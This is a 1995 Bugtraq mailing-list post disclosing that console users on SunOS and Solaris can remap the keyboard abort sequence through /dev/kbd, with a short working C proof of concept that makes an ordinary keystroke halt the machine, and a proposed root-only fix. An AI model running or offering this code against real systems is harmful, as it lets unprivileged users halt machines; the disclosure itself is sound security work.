Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

little whole on Suns concerning /dev/kbd

From: Arfst.Ludwig () luxor in-berlin de (Arfst Ludwig)
Date: Sat, 2 Dec 1995 23:56:03 +0100

Hi!

On a SUN with SunOS 4.1.* or Solaris 2.* any user loged on the console can
remap the abort key sequence (the key sequence to enter the boot monitor).
Impact: Any arbitary key sequence can enter the boot monitor and halt
the machine.

The abort key sequence can easyly remaped e.g. to shift_l a. Instead of
getting an `A' the user gets the boot monitor promt:

8<--------------------------- cut here ----------------------------
#include <stdio.h>
#include <fcntl.h>
#include <sundev/kbd.h>
#include <sundev/kbio.h>

int main()
{
  int fd;
  struct kiockey k;

  fd = open("/dev/kbd", O_RDWR);
  k.kio_tablemask = KIOCABORT1;
  k.kio_station = 0x6e;
  ioctl(fd, KIOCSETKEY, &k);
  k.kio_tablemask = KIOCABORT2;
  k.kio_station = 0x4d;
  ioctl(fd, KIOCSETKEY, &k);
  close(fd);
  return (0);
}
8<--------------------------- cut here ----------------------------

Is there a fix possible? /dev/kbd should be readable to the user logged
at the console. Redefining the abort sequence should only be allowed
via an new device e.g.  /dev/kbdctl which is accessible only by root.

Cheers, Arfst
______________________________________________________________________
  __
 (00)   Arfst Ludwig
  \`\/  E-Mail: Arfst.Ludwig () luxor in-berlin de
   ""   carpe diem
Previous By Date Next
Previous By Thread Next

Current thread: